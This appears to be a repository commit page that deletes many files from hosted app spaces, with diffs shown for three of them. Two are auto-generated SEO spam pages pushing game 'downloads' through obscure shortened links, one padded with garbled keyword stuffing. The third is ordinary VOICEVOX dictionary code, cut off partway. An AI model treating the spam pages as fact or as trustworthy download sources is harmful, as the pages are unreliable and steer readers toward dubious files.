Commit
·
fde2cf7
1
Parent(s):
2014994
Update parquet files (step 56 of 397)
Browse filesThis view is limited to 50 files because it contains too many changes.
See raw diff
- spaces/1gistliPinn/ChatGPT4/Examples/Best Darkest Hour Mods.md +0 -6
- spaces/1phancelerku/anime-remove-background/Download Draft Checkers Play Different Variants of the Game.md +0 -117
- spaces/2ndelement/voicevox/voicevox_engine/user_dict.py +0 -298
- spaces/4th3n4/TraDeX/README.md +0 -23
- spaces/A00001/bingothoo/src/components/chat.tsx +0 -93
- spaces/AIFILMS/Pix2Pix-Video/app.py +0 -248
- spaces/AIZerotoHero-Health4All/03-Datasets/README.md +0 -12
- spaces/ATang0729/Forecast4Muses/Model/Model6/__init__.py +0 -0
- spaces/AchyuthGamer/OpenGPT-Chat-UI/.svelte-kit/types/src/routes/r/[id]/proxy+page.server.ts +0 -35
- spaces/AchyuthGamer/OpenGPT/g4f/Provider/Theb.py +0 -97
- spaces/AgentVerse/agentVerse/agentverse/environments/simulation_env/rules/visibility/sde_team.py +0 -24
- spaces/Agusbs98/automatic-ecg-diagnosis/README.md +0 -12
- spaces/Alican/pixera/options/__init__.py +0 -1
- spaces/Amrrs/DragGan-Inversion/stylegan_human/dnnlib/tflib/tfutil.py +0 -267
- spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_paradigms.py +0 -770
- spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3/deeplabv3_r101-d8_480x480_40k_pascal_context.py +0 -2
- spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/Training_PRO/README.md +0 -56
- spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/edits.py +0 -101
- spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/video/__init__.py +0 -11
- spaces/Anonymous-sub/Rerender/ControlNet/gradio_normal2image.py +0 -99
- spaces/Archan/ArXivAudio/get_pages.py +0 -21
- spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_internal/resolution/resolvelib/reporter.py +0 -80
- spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/importlib_resources/_adapters.py +0 -170
- spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/chardet/metadata/__init__.py +0 -0
- spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/align.py +0 -311
- spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/command/bdist_rpm.py +0 -615
- spaces/Boadiwaa/Recipes/openai/api_resources/error_object.py +0 -22
- spaces/BorisovMaksim/denoising/denoisers/__init__.py +0 -14
- spaces/BradAllgood/fastai_chapter2_new/app.py +0 -28
- spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/.github/pull_request_template.md +0 -8
- spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/modeling/__init__.py +0 -56
- spaces/CVPR/GFPGAN-example/gfpgan/__init__.py +0 -7
- spaces/CVPR/LIVE/thrust/thrust/random/detail/linear_congruential_engine_discard.h +0 -107
- spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/fill.h +0 -22
- spaces/CVPR/LIVE/thrust/thrust/system/cuda/detail/set_operations.h +0 -1998
- spaces/CVPR/monoscene_lite/README.md +0 -13
- spaces/CazimirRoman/summarize-your-webpage-api-with-gradio/app.py +0 -35
- spaces/Chatop/Lab10/README.md +0 -13
- spaces/ChrisPreston/diff-svc_minato_aqua/utils/indexed_datasets.py +0 -73
- spaces/ClearLove443/Robby-chatbot/modules/layout.py +0 -44
- spaces/CognitiveLabs/Research-Assistant/processing/text.py +0 -18
- spaces/DAMO-NLP-SG/Video-LLaMA/video_llama/common/config.py +0 -468
- spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/_core/_eventloop.py +0 -153
- spaces/Dagfinn1962/stablediffusion-articlera/index.html +0 -271
- spaces/Dinoking/Guccio-AI-Designer/netdissect/segviz.py +0 -283
- spaces/ECCV2022/bytetrack/tools/interpolation.py +0 -143
- spaces/EPFL-VILAB/MultiMAE/utils/taskonomy/__init__.py +0 -1
- spaces/EtTKSf/uu/Dockerfile +0 -13
- spaces/FawnPythn/andite-anything-v4.0/app.py +0 -3
- spaces/Finnone/stabilityai-stablelm-tuned-alpha-7b/app.py +0 -3
spaces/1gistliPinn/ChatGPT4/Examples/Best Darkest Hour Mods.md
DELETED
@@ -1,6 +0,0 @@
|
|
1 |
-
<h2>best darkest hour mods</h2><br /><p><b><b>Download Zip</b> ⚙ <a href="https://imgfil.com/2uxXcd">https://imgfil.com/2uxXcd</a></b></p><br /><br />
|
2 |
-
|
3 |
-
4d29de3e1b<br />
|
4 |
-
<br />
|
5 |
-
<br />
|
6 |
-
<p></p>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/1phancelerku/anime-remove-background/Download Draft Checkers Play Different Variants of the Game.md
DELETED
@@ -1,117 +0,0 @@
|
|
1 |
-
|
2 |
-
<h1>Download Draft Checkers: A Classic Strategy Board Game for Your PC</h1>
|
3 |
-
<p>Do you love playing board games? Do you enjoy challenging your mind and logic? Do you want to have fun with your friends or family? If you answered yes to any of these questions, then you should try playing draft checkers. Draft checkers, also known as draughts or checkers, is a classic strategy board game that you can play on your PC. In this article, we will tell you everything you need to know about draft checkers, including its history, rules, benefits, challenges, and how to download it for your PC.</p>
|
4 |
-
<h2>What is draft checkers?</h2>
|
5 |
-
<p>Draft checkers is a group of strategy board games for two players that involve diagonal moves of uniform game pieces and mandatory captures by jumping over opponent pieces. The most common version of draft checkers is played on an 8x8 board with 12 pieces per player, but there are many other variations with different board sizes, number of pieces, and rules. The objective of draft checkers is to capture all of your opponent's pieces or block them from making any legal moves.</p>
|
6 |
-
<h2>download draft checkers</h2><br /><p><b><b>DOWNLOAD</b> — <a href="https://jinyurl.com/2uNMy0">https://jinyurl.com/2uNMy0</a></b></p><br /><br />
|
7 |
-
<h3>The history and origin of draft checkers</h3>
|
8 |
-
<p>Draft checkers is one of the oldest board games in the world, dating back to ancient times. The earliest evidence of draft checkers was found in Mesopotamia, around 3000 BC. The game was also played by the ancient Egyptians, Greeks, Romans, Persians, Chinese, Indians, and Arabs. The modern version of draft checkers was developed in France in the 12th century, and spread to other parts of Europe and America. Draft checkers became popular among people of all ages and social classes, and was considered a game of skill and intelligence.</p>
|
9 |
-
<h3>The rules and variations of draft checkers</h3>
|
10 |
-
<p>The basic rules of draft checkers are simple: each player has 12 pieces (usually black or white) that are placed on the dark squares of an 8x8 board. The players take turns moving one piece diagonally forward to an adjacent empty square. If a player can jump over an opponent's piece to an empty square behind it, they must do so and capture that piece. A piece that reaches the opposite end of the board becomes a king or queen, which can move and jump in any direction. The game ends when one player has no more pieces or legal moves.</p>
|
11 |
-
<p>However, there are many variations of draft checkers that have different rules and features. Some of the most common variations are:</p>
|
12 |
-
<ul>
|
13 |
-
<li>International draughts: played on a 10x10 board with 20 pieces per player.</li>
|
14 |
-
<li>Brazilian draughts: played on an 8x8 board with flying kings that can move any distance along unblocked diagonals.</li>
|
15 |
-
<li>Turkish draughts: played on an 8x8 board with pieces that move orthogonally (horizontally or vertically) and capture by jumping over two pieces at a time.</li>
|
16 |
-
<li>Canadian checkers: played on a 12x12 board with 30 pieces per player.</li>
|
17 |
-
<li>Pool checkers: played on an 8x8 board with pieces that can move and capture backwards.</li>
|
18 |
-
</ul>
|
19 |
-
<p>You can choose the variation that suits your preference and skill level, or try them all to challenge yourself and have more fun.</p>
|
20 |
-
<h3>The benefits and challenges of draft checkers</h3>
|
21 |
-
<p>Draft checkers is not only a fun and entertaining game, but also a beneficial and challenging one. Some of the benefits of playing draft checkers are:</p>
|
22 |
-
<ul>
|
23 |
-
<li>It improves your logical thinking and problem-solving skills, as you have to plan your moves and anticipate your opponent's moves.</li>
|
24 |
-
<li>It enhances your memory and concentration, as you have to remember the positions and rules of the game.</li>
|
25 |
-
<li>It stimulates your creativity and imagination, as you have to come up with new strategies and tactics to win the game.</li>
|
26 |
-
<li>It reduces your stress and anxiety, as you have to focus on the game and forget about your worries.</li>
|
27 |
-
<li>It strengthens your social skills and relationships, as you can play with your friends or family, or make new friends online.</li>
|
28 |
-
</ul>
|
29 |
-
<p>Some of the challenges of playing draft checkers are:</p>
|
30 |
-
<ul>
|
31 |
-
<li>It requires patience and perseverance, as you have to deal with losing and learning from your mistakes.</li>
|
32 |
-
<li>It demands attention and discipline, as you have to follow the rules and respect your opponent.</li>
|
33 |
-
<li>It tests your intelligence and confidence, as you have to face different levels of difficulty and competition.</li>
|
34 |
-
</ul>
|
35 |
-
<p>Draft checkers is a game that can help you grow as a person and have fun at the same time.</p>
|
36 |
-
<h2>How to download draft checkers for your PC?</h2>
|
37 |
-
<p>If you want to play draft checkers on your PC, you will need to download it from a reliable source or website. There are many options available online, but not all of them are safe and secure. Some of them may contain viruses, malware, or spyware that can harm your PC or steal your personal information. Therefore, you should be careful and choose wisely when downloading draft checkers for your PC.</p>
|
38 |
-
<p>Download draughts checkers game app<br />
|
39 |
-
How to download checkers by Dalmax for Windows 10<br />
|
40 |
-
Download free checkers game for Android<br />
|
41 |
-
Best checkers game to download for kids<br />
|
42 |
-
Download checkers 10x10 board game<br />
|
43 |
-
Download checkers with custom rules option<br />
|
44 |
-
Download checkers with different rule sets<br />
|
45 |
-
Download checkers with multiplayer mode<br />
|
46 |
-
Download checkers with AI difficulty levels<br />
|
47 |
-
Download checkers with undo function<br />
|
48 |
-
Download draughts HD for Windows 10<br />
|
49 |
-
Download draughts checkerboard game<br />
|
50 |
-
Download draughts with international rules<br />
|
51 |
-
Download draughts with Brazilian rules<br />
|
52 |
-
Download draughts with pool rules<br />
|
53 |
-
Download draughts with Spanish rules<br />
|
54 |
-
Download draughts with Russian rules<br />
|
55 |
-
Download draughts with Portuguese rules<br />
|
56 |
-
Download draughts with Czech rules<br />
|
57 |
-
Download draughts with Turkish rules<br />
|
58 |
-
Download draughts with Thai rules<br />
|
59 |
-
Download checkers | Draughts game by MGGAMES<br />
|
60 |
-
Download classic checkers game for PC<br />
|
61 |
-
Download checkers game with realistic graphics<br />
|
62 |
-
Download checkers game with offline mode<br />
|
63 |
-
Download checkers game with data encryption<br />
|
64 |
-
Download checkers game with data deletion option<br />
|
65 |
-
Download checkers game with trailer video<br />
|
66 |
-
Download checkers game with ratings and reviews<br />
|
67 |
-
Download checkers game with in-app purchases<br />
|
68 |
-
Download checkers game with ads-free option<br />
|
69 |
-
Download checkers game with strategy tips<br />
|
70 |
-
Download checkers game with analysis tool<br />
|
71 |
-
Download checkers game with board flipping feature<br />
|
72 |
-
Download checkers game with net energy gain feature<br />
|
73 |
-
Download checkers game with holy grail fusion experiment feature<br />
|
74 |
-
Download checkers game with mini sun feature<br />
|
75 |
-
Download checkers game with 100 million°C feature<br />
|
76 |
-
Download checkers game with 30 seconds feature<br />
|
77 |
-
Download checkers game with Korea Institute of Fusion Energy feature</p>
|
78 |
-
<h3>The best sources and websites to download draft checkers</h3>
|
79 |
-
<p>To help you find the best sources and websites to download draft checkers for your PC, we have compiled a list of some of the most popular and trusted ones. Here they are:</p>
|
80 |
-
<h4><a href="">Checkers | Draughts game - Apps on Google Play</a></h4>
|
81 |
-
<p>This is one of the best apps to play draft checkers on your PC. It has over 10 million downloads and 4.5 stars rating on Google Play. It offers different modes, levels, themes, boards, pieces, rules, and languages. You can play against the computer or online with other players. You can also customize the game according to your preferences. To download this app, you will need an Android emulator such as BlueStacks or NoxPlayer on your PC.</p>
|
82 |
-
<h4><a href="">Download Checkers Draughts Game 4.4.1 for Windows - FileHippo</a></h4>
|
83 |
-
<p>This is another great option to play draft checkers on your PC. It is a free software that you can download from FileHippo, a reputable website that provides safe and secure downloads. It has over 100 thousand downloads and 3.9 stars rating on FileHippo. It features different variations of draft checkers such as American, International, Russian, Brazilian, Pool, Turkish, etc. You can play against the computer or with another player on the same PC. You can also adjust the difficulty level and speed of the game.</p>
|
84 |
-
<h4><a href="">Draft game | Free Downloads Games - ONLINESOLN</a></h4>
|
85 |
-
<p>This is a simple and easy way to play draft checkers on your PC. It is a free online game that you can access from any browser without downloading anything. It has over 50 thousand plays and 4 stars rating on ONLINESOLN, a website that provides free online games for everyone. It features a classic version of draft checkers with an 8x8 board and 12 pieces per player. You can play against the computer or with another player online. You can also undo or redo your moves if you make a mistake.</p>
|
86 |
-
<h3>The steps and tips to install and play draft checkers on your PC</h3>
|
87 |
-
<p>Now that you know some of the best sources and websites to download draft checkers for your PC, you may wonder how to install and play it on your PC. Don't worry, we have got you covered. Here are the steps and tips to install and play draft checkers on your PC:</p>
|
88 |
-
<h4>Step 1: Choose your preferred source and website to download draft checkers</h4>
|
89 |
-
<p>The first step is to choose your preferred source and website to download draft checkers for your PC. You can use any of the sources and websites we mentioned above, or you can search for other options online. However, make sure that the source and website you choose is reliable, safe, and secure. You can check the reviews, ratings, comments, and feedback of other users to verify the quality and credibility of the source and website.</p>
|
90 |
-
<h4>Step 2: Download the draft checkers file or app to your PC</h4>
|
91 |
-
<p>The next step is to download the draft checkers file or app to your PC. Depending on the source and website you choose, you may need to create an account, sign in, or register before downloading. You may also need to agree to the terms and conditions, privacy policy, or license agreement of the source and website. After that, you can click on the download button or link and save the draft checkers file or app to your PC. You may need to choose a location or folder where you want to save the file or app.</p>
|
92 |
-
<h4>Step 3: Install the draft checkers file or app on your PC</h4>
|
93 |
-
<p>The third step is to install the draft checkers file or app on your PC. To do this, you need to locate the draft checkers file or app on your PC and double-click on it. You may need to grant permission or access to run the file or app on your PC. You may also need to follow the instructions or steps on the screen to complete the installation process. You may need to choose a destination or location where you want to install the file or app.</p>
|
94 |
-
<h4>Step 4: Launch the draft checkers file or app and start playing</h4>
|
95 |
-
<p>The final step is to launch the draft checkers file or app and start playing. To do this, you need to find the draft checkers icon or shortcut on your PC and click on it. You may need to wait for a few seconds for the file or app to load and open. After that, you can choose the mode, level, theme, board, piece, rule, and language of the game. You can also invite or join other players online if you want to play with them. Then, you can start playing draft checkers on your PC and have fun.</p>
|
96 |
-
<h4>Tip 1: Adjust the settings and preferences of the draft checkers file or app according to your needs</h4>
|
97 |
-
<p>One tip that can help you enjoy playing draft checkers on your PC is to adjust the settings and preferences of the draft checkers file or app according to your needs. You can access the settings and preferences menu from the main screen or menu of the file or app. You can change various aspects of the game such as sound, music, graphics, speed, difficulty, etc. You can also enable or disable notifications, updates, ads, etc. You can also reset or restore the default settings and preferences if you want.</p>
|
98 |
-
<h4>Tip 2: Learn the basic strategies and tactics of draft checkers to improve your skills</h4>
|
99 |
-
<p>Another tip that can help you enjoy playing draft checkers on your PC is to learn the basic strategies and tactics of draft checkers to improve your skills. You can find various resources online that can teach you how to play draft checkers better such as tutorials, guides, videos, blogs, forums, etc. You can also practice playing draft checkers regularly with different opponents and challenges. You can also learn from your mistakes and feedback from other players. By doing this, you can become a better player of draft checkers.</p>
|
100 |
-
<h2>Conclusion</h2>
|
101 |
-
<p>Draft checkers is a classic strategy board game that you can play on your PC. It has a rich history, diverse rules, multiple benefits, and exciting challenges. It is easy to download, install, and play draft checkers on your PC. You just need to choose a reliable source or website to download draft checkers, follow the steps and tips to install and play draft checkers, and adjust the settings and preferences of the game according to your needs. You can also learn the basic strategies and tactics of draft checkers to improve your skills and have more fun. Draft checkers is a game that can keep you entertained, challenged, and satisfied for hours. So, what are you waiting for? Download draft checkers for your PC today and enjoy playing this classic strategy board game.</p>
|
102 |
-
<h2>FAQs</h2>
|
103 |
-
<p>Here are some of the frequently asked questions about draft checkers:</p>
|
104 |
-
<ul>
|
105 |
-
<li>Q: Is draft checkers free to download and play on PC?</li>
|
106 |
-
<li>A: Yes, draft checkers is free to download and play on PC. However, some sources or websites may require you to create an account, sign in, or register before downloading. Some files or apps may also contain ads, in-app purchases, or premium features that may require payment.</li>
|
107 |
-
<li>Q: Is draft checkers safe and secure to download and play on PC?</li>
|
108 |
-
<li>A: Yes, draft checkers is safe and secure to download and play on PC. However, you should be careful and choose a reliable source or website to download draft checkers. You should also scan the file or app for viruses, malware, or spyware before installing it on your PC.</li>
|
109 |
-
<li>Q: Is draft checkers compatible with all PCs?</li>
|
110 |
-
<li>A: Yes, draft checkers is compatible with all PCs. However, you may need to check the system requirements and specifications of the file or app before downloading it on your PC. You may also need to update your PC's software, drivers, or hardware to ensure optimal performance of the game.</li>
|
111 |
-
<li>Q: Can I play draft checkers offline on PC?</li>
|
112 |
-
<li>A: Yes, you can play draft checkers offline on PC. However, you may need to download the file or app first before playing it offline. You may also need an internet connection to access some features or functions of the game such as online multiplayer mode, updates, etc.</li>
|
113 |
-
<li>Q: Can I play draft checkers with other players online on PC?</li>
|
114 |
-
<li>A: Yes, you can play draft checkers with other players online on PC. However, you may need an internet connection and an account or profile to access the online multiplayer mode of the game. You may also need to invite or join other players online through the game's interface or platform.</li>
|
115 |
-
</ul></p> 197e85843d<br />
|
116 |
-
<br />
|
117 |
-
<br />
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/2ndelement/voicevox/voicevox_engine/user_dict.py
DELETED
@@ -1,298 +0,0 @@
|
|
1 |
-
import json
|
2 |
-
import sys
|
3 |
-
import threading
|
4 |
-
import traceback
|
5 |
-
from pathlib import Path
|
6 |
-
from typing import Dict, List, Optional
|
7 |
-
from uuid import UUID, uuid4
|
8 |
-
|
9 |
-
import numpy as np
|
10 |
-
import pyopenjtalk
|
11 |
-
from fastapi import HTTPException
|
12 |
-
from pydantic import conint
|
13 |
-
|
14 |
-
from .model import UserDictWord, WordTypes
|
15 |
-
from .part_of_speech_data import MAX_PRIORITY, MIN_PRIORITY, part_of_speech_data
|
16 |
-
from .utility import engine_root, get_save_dir, mutex_wrapper
|
17 |
-
|
18 |
-
root_dir = engine_root()
|
19 |
-
save_dir = get_save_dir()
|
20 |
-
|
21 |
-
if not save_dir.is_dir():
|
22 |
-
save_dir.mkdir(parents=True)
|
23 |
-
|
24 |
-
default_dict_path = root_dir / "default.csv"
|
25 |
-
user_dict_path = save_dir / "user_dict.json"
|
26 |
-
compiled_dict_path = save_dir / "user.dic"
|
27 |
-
|
28 |
-
|
29 |
-
mutex_user_dict = threading.Lock()
|
30 |
-
mutex_openjtalk_dict = threading.Lock()
|
31 |
-
|
32 |
-
|
33 |
-
@mutex_wrapper(mutex_user_dict)
|
34 |
-
def write_to_json(user_dict: Dict[str, UserDictWord], user_dict_path: Path):
|
35 |
-
converted_user_dict = {}
|
36 |
-
for word_uuid, word in user_dict.items():
|
37 |
-
word_dict = word.dict()
|
38 |
-
word_dict["cost"] = priority2cost(
|
39 |
-
word_dict["context_id"], word_dict["priority"]
|
40 |
-
)
|
41 |
-
del word_dict["priority"]
|
42 |
-
converted_user_dict[word_uuid] = word_dict
|
43 |
-
# 予めjsonに変換できることを確かめる
|
44 |
-
user_dict_json = json.dumps(converted_user_dict, ensure_ascii=False)
|
45 |
-
user_dict_path.write_text(user_dict_json, encoding="utf-8")
|
46 |
-
|
47 |
-
|
48 |
-
@mutex_wrapper(mutex_openjtalk_dict)
|
49 |
-
def update_dict(
|
50 |
-
default_dict_path: Path = default_dict_path,
|
51 |
-
user_dict_path: Path = user_dict_path,
|
52 |
-
compiled_dict_path: Path = compiled_dict_path,
|
53 |
-
):
|
54 |
-
random_string = uuid4()
|
55 |
-
tmp_csv_path = save_dir / f".tmp.dict_csv-{random_string}"
|
56 |
-
tmp_compiled_path = save_dir / f".tmp.dict_compiled-{random_string}"
|
57 |
-
|
58 |
-
try:
|
59 |
-
# 辞書.csvを作成
|
60 |
-
csv_text = ""
|
61 |
-
if not default_dict_path.is_file():
|
62 |
-
print("Warning: Cannot find default dictionary.", file=sys.stderr)
|
63 |
-
return
|
64 |
-
default_dict = default_dict_path.read_text(encoding="utf-8")
|
65 |
-
if default_dict == default_dict.rstrip():
|
66 |
-
default_dict += "\n"
|
67 |
-
csv_text += default_dict
|
68 |
-
user_dict = read_dict(user_dict_path=user_dict_path)
|
69 |
-
for word_uuid in user_dict:
|
70 |
-
word = user_dict[word_uuid]
|
71 |
-
csv_text += (
|
72 |
-
"{surface},{context_id},{context_id},{cost},{part_of_speech},"
|
73 |
-
+ "{part_of_speech_detail_1},{part_of_speech_detail_2},"
|
74 |
-
+ "{part_of_speech_detail_3},{inflectional_type},"
|
75 |
-
+ "{inflectional_form},{stem},{yomi},{pronunciation},"
|
76 |
-
+ "{accent_type}/{mora_count},{accent_associative_rule}\n"
|
77 |
-
).format(
|
78 |
-
surface=word.surface,
|
79 |
-
context_id=word.context_id,
|
80 |
-
cost=priority2cost(word.context_id, word.priority),
|
81 |
-
part_of_speech=word.part_of_speech,
|
82 |
-
part_of_speech_detail_1=word.part_of_speech_detail_1,
|
83 |
-
part_of_speech_detail_2=word.part_of_speech_detail_2,
|
84 |
-
part_of_speech_detail_3=word.part_of_speech_detail_3,
|
85 |
-
inflectional_type=word.inflectional_type,
|
86 |
-
inflectional_form=word.inflectional_form,
|
87 |
-
stem=word.stem,
|
88 |
-
yomi=word.yomi,
|
89 |
-
pronunciation=word.pronunciation,
|
90 |
-
accent_type=word.accent_type,
|
91 |
-
mora_count=word.mora_count,
|
92 |
-
accent_associative_rule=word.accent_associative_rule,
|
93 |
-
)
|
94 |
-
tmp_csv_path.write_text(csv_text, encoding="utf-8")
|
95 |
-
|
96 |
-
# 辞書.csvをOpenJTalk用にコンパイル
|
97 |
-
pyopenjtalk.create_user_dict(str(tmp_csv_path), str(tmp_compiled_path))
|
98 |
-
if not tmp_compiled_path.is_file():
|
99 |
-
raise RuntimeError("辞書のコンパイル時にエラーが発生しました。")
|
100 |
-
|
101 |
-
# コンパイル済み辞書の置き換え・読み込み
|
102 |
-
pyopenjtalk.unset_user_dict()
|
103 |
-
tmp_compiled_path.replace(compiled_dict_path)
|
104 |
-
if compiled_dict_path.is_file():
|
105 |
-
pyopenjtalk.set_user_dict(str(compiled_dict_path.resolve(strict=True)))
|
106 |
-
|
107 |
-
except Exception as e:
|
108 |
-
print("Error: Failed to update dictionary.", file=sys.stderr)
|
109 |
-
traceback.print_exc(file=sys.stderr)
|
110 |
-
raise e
|
111 |
-
|
112 |
-
finally:
|
113 |
-
# 後処理
|
114 |
-
if tmp_csv_path.exists():
|
115 |
-
tmp_csv_path.unlink()
|
116 |
-
if tmp_compiled_path.exists():
|
117 |
-
tmp_compiled_path.unlink()
|
118 |
-
|
119 |
-
|
120 |
-
@mutex_wrapper(mutex_user_dict)
|
121 |
-
def read_dict(user_dict_path: Path = user_dict_path) -> Dict[str, UserDictWord]:
|
122 |
-
if not user_dict_path.is_file():
|
123 |
-
return {}
|
124 |
-
with user_dict_path.open(encoding="utf-8") as f:
|
125 |
-
result = {}
|
126 |
-
for word_uuid, word in json.load(f).items():
|
127 |
-
# cost2priorityで変換を行う際にcontext_idが必要となるが、
|
128 |
-
# 0.12以前の辞書は、context_idがハードコーディングされていたためにユーザー辞書内に保管されていない
|
129 |
-
# ハードコーディングされていたcontext_idは固有名詞を意味するものなので、固有名詞のcontext_idを補完する
|
130 |
-
if word.get("context_id") is None:
|
131 |
-
word["context_id"] = part_of_speech_data[
|
132 |
-
WordTypes.PROPER_NOUN
|
133 |
-
].context_id
|
134 |
-
word["priority"] = cost2priority(word["context_id"], word["cost"])
|
135 |
-
del word["cost"]
|
136 |
-
result[str(UUID(word_uuid))] = UserDictWord(**word)
|
137 |
-
|
138 |
-
return result
|
139 |
-
|
140 |
-
|
141 |
-
def create_word(
|
142 |
-
surface: str,
|
143 |
-
pronunciation: str,
|
144 |
-
accent_type: int,
|
145 |
-
word_type: Optional[WordTypes] = None,
|
146 |
-
priority: Optional[int] = None,
|
147 |
-
) -> UserDictWord:
|
148 |
-
if word_type is None:
|
149 |
-
word_type = WordTypes.PROPER_NOUN
|
150 |
-
if word_type not in part_of_speech_data.keys():
|
151 |
-
raise HTTPException(status_code=422, detail="不明な品詞です")
|
152 |
-
if priority is None:
|
153 |
-
priority = 5
|
154 |
-
if not MIN_PRIORITY <= priority <= MAX_PRIORITY:
|
155 |
-
raise HTTPException(status_code=422, detail="優先度の値が無効です")
|
156 |
-
pos_detail = part_of_speech_data[word_type]
|
157 |
-
return UserDictWord(
|
158 |
-
surface=surface,
|
159 |
-
context_id=pos_detail.context_id,
|
160 |
-
priority=priority,
|
161 |
-
part_of_speech=pos_detail.part_of_speech,
|
162 |
-
part_of_speech_detail_1=pos_detail.part_of_speech_detail_1,
|
163 |
-
part_of_speech_detail_2=pos_detail.part_of_speech_detail_2,
|
164 |
-
part_of_speech_detail_3=pos_detail.part_of_speech_detail_3,
|
165 |
-
inflectional_type="*",
|
166 |
-
inflectional_form="*",
|
167 |
-
stem="*",
|
168 |
-
yomi=pronunciation,
|
169 |
-
pronunciation=pronunciation,
|
170 |
-
accent_type=accent_type,
|
171 |
-
accent_associative_rule="*",
|
172 |
-
)
|
173 |
-
|
174 |
-
|
175 |
-
def apply_word(
|
176 |
-
surface: str,
|
177 |
-
pronunciation: str,
|
178 |
-
accent_type: int,
|
179 |
-
word_type: Optional[WordTypes] = None,
|
180 |
-
priority: Optional[int] = None,
|
181 |
-
user_dict_path: Path = user_dict_path,
|
182 |
-
compiled_dict_path: Path = compiled_dict_path,
|
183 |
-
) -> str:
|
184 |
-
word = create_word(
|
185 |
-
surface=surface,
|
186 |
-
pronunciation=pronunciation,
|
187 |
-
accent_type=accent_type,
|
188 |
-
word_type=word_type,
|
189 |
-
priority=priority,
|
190 |
-
)
|
191 |
-
user_dict = read_dict(user_dict_path=user_dict_path)
|
192 |
-
word_uuid = str(uuid4())
|
193 |
-
user_dict[word_uuid] = word
|
194 |
-
write_to_json(user_dict, user_dict_path)
|
195 |
-
update_dict(user_dict_path=user_dict_path, compiled_dict_path=compiled_dict_path)
|
196 |
-
return word_uuid
|
197 |
-
|
198 |
-
|
199 |
-
def rewrite_word(
|
200 |
-
word_uuid: str,
|
201 |
-
surface: str,
|
202 |
-
pronunciation: str,
|
203 |
-
accent_type: int,
|
204 |
-
word_type: Optional[WordTypes] = None,
|
205 |
-
priority: Optional[int] = None,
|
206 |
-
user_dict_path: Path = user_dict_path,
|
207 |
-
compiled_dict_path: Path = compiled_dict_path,
|
208 |
-
):
|
209 |
-
word = create_word(
|
210 |
-
surface=surface,
|
211 |
-
pronunciation=pronunciation,
|
212 |
-
accent_type=accent_type,
|
213 |
-
word_type=word_type,
|
214 |
-
priority=priority,
|
215 |
-
)
|
216 |
-
user_dict = read_dict(user_dict_path=user_dict_path)
|
217 |
-
if word_uuid not in user_dict:
|
218 |
-
raise HTTPException(status_code=422, detail="UUIDに該当するワードが見つかりませんでした")
|
219 |
-
user_dict[word_uuid] = word
|
220 |
-
write_to_json(user_dict, user_dict_path)
|
221 |
-
update_dict(user_dict_path=user_dict_path, compiled_dict_path=compiled_dict_path)
|
222 |
-
|
223 |
-
|
224 |
-
def delete_word(
|
225 |
-
word_uuid: str,
|
226 |
-
user_dict_path: Path = user_dict_path,
|
227 |
-
compiled_dict_path: Path = compiled_dict_path,
|
228 |
-
):
|
229 |
-
user_dict = read_dict(user_dict_path=user_dict_path)
|
230 |
-
if word_uuid not in user_dict:
|
231 |
-
raise HTTPException(status_code=422, detail="IDに該当するワードが見つかりませんでした")
|
232 |
-
del user_dict[word_uuid]
|
233 |
-
write_to_json(user_dict, user_dict_path)
|
234 |
-
update_dict(user_dict_path=user_dict_path, compiled_dict_path=compiled_dict_path)
|
235 |
-
|
236 |
-
|
237 |
-
def import_user_dict(
|
238 |
-
dict_data: Dict[str, UserDictWord],
|
239 |
-
override: bool = False,
|
240 |
-
user_dict_path: Path = user_dict_path,
|
241 |
-
default_dict_path: Path = default_dict_path,
|
242 |
-
compiled_dict_path: Path = compiled_dict_path,
|
243 |
-
):
|
244 |
-
# 念のため型チェックを行う
|
245 |
-
for word_uuid, word in dict_data.items():
|
246 |
-
UUID(word_uuid)
|
247 |
-
assert type(word) == UserDictWord
|
248 |
-
for pos_detail in part_of_speech_data.values():
|
249 |
-
if word.context_id == pos_detail.context_id:
|
250 |
-
assert word.part_of_speech == pos_detail.part_of_speech
|
251 |
-
assert (
|
252 |
-
word.part_of_speech_detail_1 == pos_detail.part_of_speech_detail_1
|
253 |
-
)
|
254 |
-
assert (
|
255 |
-
word.part_of_speech_detail_2 == pos_detail.part_of_speech_detail_2
|
256 |
-
)
|
257 |
-
assert (
|
258 |
-
word.part_of_speech_detail_3 == pos_detail.part_of_speech_detail_3
|
259 |
-
)
|
260 |
-
assert (
|
261 |
-
word.accent_associative_rule in pos_detail.accent_associative_rules
|
262 |
-
)
|
263 |
-
break
|
264 |
-
else:
|
265 |
-
raise ValueError("対応していない品��です")
|
266 |
-
old_dict = read_dict(user_dict_path=user_dict_path)
|
267 |
-
